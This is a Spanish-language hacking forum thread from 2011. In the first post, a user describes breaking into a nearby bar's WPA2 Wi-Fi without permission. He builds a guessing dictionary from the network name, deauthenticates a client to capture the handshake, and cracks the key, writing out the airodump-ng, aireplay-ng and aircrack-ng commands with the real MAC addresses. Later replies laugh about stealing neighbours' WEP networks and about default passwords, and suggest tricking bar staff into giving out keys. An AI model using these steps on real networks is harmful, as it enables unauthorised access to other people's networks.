Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2

Publicado por D3M0N, 28 de Abril de 2011, 07:31:36 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

D3M0N

 :o resulta que hoy crackie mi primer WPA2, todo un logro... y lo mí¡s comín es que lo hice razonando y aplicando un poco de lo que se llama "You are not allowed to view links. Register or Login".

NOTA: este metodo puede o no funcionar, en mi caso fue simplemente un razonamiento aplicado a esta red. Pueda que nunca crackies un WPA/WPA2 con este funcionamiento.

LA HISTORIA:

resulta que estando con un par de amigos encontramos una red con buena calidad que era de un bar cercano llamado "Viejo Correo" y todos los pibes como me conocen... -Che, hackiate la red esa asi tenemos internet...- tipico como si fuera tan facil y bueno lo primero que hice fue ver el cifrado, cuando vi que era WPA2 con PSK (CCMP) les dije que era gratamente imposible, ya que es un cifrado muy sofisticado. entonces me dicen -y bueno proba haber que onda...- y bueno lo hice....

PROCEDIMIENTOS:

1.- la red se llamaba "Viejo Correo", se llamaba asi porque esta enfrente de un Correo; entonces cree un diccionario con palabras clave como:

correo
correozona
zonacorreo
correoviejo
correobar
correoviejobar
correobarviejo


y asi fui pensando contraseíñas que le podrian haber puesto. desde ya que la lista era un poco mí¡s larga. despues con el SGen fui creando diccionarios pero agregandole a cada palabra numeros; tome como referencia 4 numeros fue pura casualidad; enconces genere un diccionario con cada palabra + numero de 4 cifras. ejemplo:

correo0000 -> correo9999
correozona0000 -> correozona9999
correobarviejo0000 -> correobarviejo9999


aun asi sin saber el rango de digitos de la contraseíña pence que tendria que ser chica para que los clientes puedan escribirla ellos mismos. Enconces junte todo en un diccionario y me fui al AirUbuntu 10.04.

CRACKEO:

primero lance un airodump-ng para ver la informacion de la red.

Código: php
airodump-ng -w cap mon0



luego hice:

Código: php
airodump-ng -c 11 -w viejocorreo --bssid 54:E6:FC:AB:0B:48 mon0


ya ahora estaba capturando los #Datas. Espere a ver todos los users y seleccione el user con mayor transferencia de Paquetes.

Luego lance el Aireplay:

Código: php
aireplay-ng -0 5 -a 54:E6:FC:AB:0B:48 -c 1C:4B:D6:68:92:2B mon0


sale handshake en airodump-ng y continuo con el crack:

Código: php
aircrack-ng -w /home/diccionario.lst -b 54:E6:FC:AB:0B:48 viejocorreo-01.cap


y comenzo a crackear y a los pocos segundos ya la tenia crackeada, me quede duro de saber que la crackie sin ningun diccionario de 30GB que talves ni siquiera tenga la contraseíña. lo raro fue que las key que probí, figuran 8 pero probo como 3000... jjeje fue mí¡s pura suerte, los pibes se quedaron re contentos... jajaj  :'(



Comprobando la contraseíña:



TIPS PARA TENER EN CUENTA:
* nombre o nombres posibles de personas.
* ver el nombre de la red y preguntarnos ¿Que password le pondria?
* agragarle numero com referencia.

diego10

#1
jaja buena data... yo de fiaca no pruebo crackear WPA con esta iMac.. es leeenta
ahora cuando en breve tenga la nueva iMac i5 con sandy bridge y thunderbolt

YA VAN A VEEER !!  :o

PD: de un minuto a otro Apple la saca del horno bien al dente

D3M0N

You are not allowed to view links. Register or Login
jaja buena data... yo de fiaca no pruebo crackear WPA con esta iMac.. es leeenta
ahora cuando en breve tenga la nueva iMac i5 con sandy bridge y thunderbolt

YA VAN A VEEER !!  :o

si yo tengo aca por la zona dos WPA y una WPA2; tengo que ver haber como le mado con el john y la dejo 30 aíños a que termine y me diga no se ha encontrado la contraseíña.

diego10

#3
yo tengo varias WPA/WPA2 pero solo quiero internet  :P


You are not allowed to view links. Register or Login

D3M0N

#4
You are not allowed to view links. Register or Login
yo tengo varias WPA/WPA2 pero solo quiero internet  :P

You are not allowed to view links. Register or Login

jaja es gente que sabe... jejej... yo crackie uno hace un tiempo, ahora le mando WPA2... jajaj para mi que se entero.  ???

aca me llueven las "Wi-Fi Arnet" contraseíña ARNET, un amigo mio me dice -che tengo mi vecino que tiene la red "Wi-Fi Arnet" como la crackeo?- le digo: pone ARNET y listo, de seguro es esa... era esa... estaba re feliz...

spikeich

You are not allowed to view links. Register or Login
jaja buena data... yo de fiaca no pruebo crackear WPA con esta iMac.. es leeenta
ahora cuando en breve tenga la nueva iMac i5 con sandy bridge y thunderbolt

YA VAN A VEEER !!  :o

PD: de un minuto a otro Apple la saca del horno bien al dente

mmmm bababaaaaa q linda una imac i5!!!! te digo ya de una ponele 8gb! por q consume mucho igual q la pro!! la mia le tube q poner 8gb por q se me traba todo con el safari y los virtual abiertos!!

por lo otro wpa2 me da mucha fiaca!! ya cuando veo una digo mmmm cuantas horas puedo tardar!!! hasta ahora voy 0!!

D3M0N

#6
You are not allowed to view links. Register or Login
mmmm bababaaaaa q linda una imac i5!!!! te digo ya de una ponele 8gb! por q consume mucho igual q la pro!! la mia le tube q poner 8gb por q se me traba todo con el safari y los virtual abiertos!!

por lo otro wpa2 me da mucha fiaca!! ya cuando veo una digo mmmm cuantas horas puedo tardar!!! hasta ahora voy 0!!

128bit AES:

You are not allowed to view links. Register or Login

spikeich

D3M0N con esa imagen q pusiste fue para sacarme todas las ganas de probar como sacar un wpa?? dios digamos q no se invento maquina por ahora y por un buen tiempo para poder sacar una 128bits AES en minutos!! a seguir robando wep!! espero q la gente no se avive por un buen tiempo de las vulnerabilidades de las wep

diego10

#8
puedo equivocarme pero tengo entendido que la gente usa WEP porque es una mala recomendacion de windows en cuanto a seguridad...

D3M0N

igual es muy dificil que una personal use wpa2 mí¡s aun, todabia hay muchos que nisiquiera WEP le ponen... jajja... tenes el tipo que tiene 3MB y la deja libre y el probre que tiene 1MB y le pone WEP... jjajja

para el tipico que se pone internet y no tiene idea ni que hace el router, tiene al tecnico de instalacion que se la deja facil, le pone WEP y contraseíña ARNET... jajaja pero es verdad.  :-X

lo bueno que por lo menos no encontre la tipica contraseíña 12345, me muero si llego a crackear una red asi...  :-\

spikeich

ese dia nos morimos todos! jajajajja

himan20

no no no!!!!!! que mal era mal facil invitarle una cerveza  a un borracho que tenga lap cel tablet ...!!!!jajajajaj eso es ingenieria social o ya de a perdis decir al del bar que te deje checar el correo !!!!!la mayoria pasa la clave ..por que saben que solo la ivas a ocupar 5 minutos asta le pagas lo de 2 cervezas hai que pensar amigo

Grueso Calibre

Yo ya me morí hace dos meses cuando después de renegar un buen tiempo con una red de Arnet me apareció la contraseña 12345, casi me caigo de C _ _ _.

You are not allowed to view links. Register or Login
igual es muy dificil que una personal use wpa2 mí¡s aun, todabia hay muchos que nisiquiera WEP le ponen... jajja... tenes el tipo que tiene 3MB y la deja libre y el probre que tiene 1MB y le pone WEP... jjajja

para el tipico que se pone internet y no tiene idea ni que hace el router, tiene al tecnico de instalacion que se la deja facil, le pone WEP y contraseíña ARNET... jajaja pero es verdad.  :-X

lo bueno que por lo menos no encontre la tipica contraseíña 12345, me muero si llego a crackear una red asi...  :-\